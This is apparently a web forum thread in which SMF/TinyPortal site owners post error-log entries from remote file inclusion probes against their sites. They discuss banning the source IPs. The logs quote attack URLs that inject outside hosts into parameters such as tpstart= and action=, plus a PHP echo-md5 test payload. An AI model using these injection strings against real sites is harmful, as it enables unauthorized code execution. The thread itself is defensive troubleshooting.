Hi all.
I found an strange error in the log:
http://www.mydomain.com/index.php?amp;;tpstart=http://www.filter-international.com/lykoon/cimawol/deqube/QuoteDatabase error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.filter-international.com/lykoon/cimawol/deqube/, 10' at line 7
File: /var/www/vhosts/mydomain.com/httpdocs/Sources/TPortal.php
Line: 1742
And the content of the link is
Quote<?php echo md5("just_a_test");?>
Looks like somebody is trying to hack my site.
IP: 217.7.63.50
:(
Yes, it seems to be a hack attemt, ban the IP and you dont have to bother with it again.
They dont succeed with that sort of things, we can be happy that SMf and TP think of the safty first :D
Tnx G6. Ip banned :)
Found 4 errors more:
QuoteDatabase error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://honamfishing.co.kr/phpmysqladmin/libraries/oduzov/neloze/, 10' at line 7
File: /var/www/vhosts/mydomain.com/httpdocs/Sources/TPortal.php
LÃnea: 1742
?amp;;tpstart=http://honamfishing.co.kr/phpmysqladmin/libraries/oduzov/neloze/
QuoteDatabase error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.fabcraft.co.uk/forum/lovuqo/zil/, 10' at line 7
Archivo: /var/www/vhosts/mydomain.com/httpdocs/Sources/TPortal.php
LÃnea: 1742
?amp;;tpstart=http://www.fabcraft.co.uk/forum/lovuqo/zil/
QuoteYou think you're funny right? Sorry buddy but you can't call an array here. Back away before the count of 3. 1... 2... 3... BOOM! Die you fool.
?amp;action=globalAnnouncements;id=http://www.electrofed.com/_app/efc/odoqu/ferus/
QuoteYou think you're funny right? Sorry buddy but you can't call an array here. Back away before the count of 3. 1... 2... 3... BOOM! Die you fool.
?amp;action=globalAnnouncements;id=http://www.ce-enterprise.com/mambo/administrator/components/com_phpshop/classes/apel/xoc/
IP: 67.15.136.163
:o ??? >:(
Dumb hack attempts, if nothing happens don't worry
Something similar here too ;
Guest Yesterday at 22:46:48
82.192.68.19
http://www.my-domain.com/forum/index.php?www;action=http://www.cultcov.ro/huc/ugec/hamiyu/
'pages/http://www.cultcov.ro/huc/ugec/hamiyu/' Theme can not be loaded.
Yesterday at 22:46:45
82.192.68.19
http://www.my-domain.com/forum/index.php?www;action=http://www.sectoranime.com.mx/galeria/include/nokuc/kef/
'pages/http://www.sectoranime.com.mx/galeria/include/nokuc/kef/' Theme can not be loaded
and the content is ;
<?php echo md5("just_a_test");?>
keep banning.. also you might want to make sure your files (in attachments) are encrypted. new hack going around.. ;)
Thanks for the warning. Checked again and they are all encyrpted.. ;)
good deal.. now make sure if you have the shop mod that you follow the precautions for that too ok? and you should be good to go.. ;) i forgot where it was that lists what you have to do, but im sure you can search for it if you want.. dont know if you even have that, you didnt list any mods etc., but good luck and post back if you have any more issues.. :D
No shopping mod. Just SMF 1.1.4 and TP 0.9.8 .
Is it just a coincidence that these attempts have started after installing TP ?
nope not at all.. and smf and tp are the best software you could use on a forum board site. wouldnt use another kind. ;)
No, not a TP thing just a hacker attempt on a forum. There has been a lot of this with smf sites lately.
I do suggest banning the ip's on the server and not just within the forum. If you have multiple forums or sites they will possibly try to hack those as well. Banning on the server will block them from everything on the server. ;)
Yep better block on the server. Pitty that I have deleted previous attempts :(
IP: 66.249.67.234 . This has been trying to use this almost every 5-6 hours. Now completely blocked.
They can be persistent, can't they. LOL
They sure are :D
Here is another one ;
91.142.210.125
http://www.my-domain.com/forum/index.php?action=about/template.php?name=http://www.mta.cl/galeria2/galery.txt?
By the way I found out that the persistent IP belonged to Google. How come that can happen ? Someone is manipulating the IP as it sends the package ?
No, more like google has stumbled across a hack attempt earlier and just follows it.
Bloc, do you think reporting google about this may help ?
Why don't you find out? :)
Sure I will give it a try but if someone knew it would not worth why waste time ? :)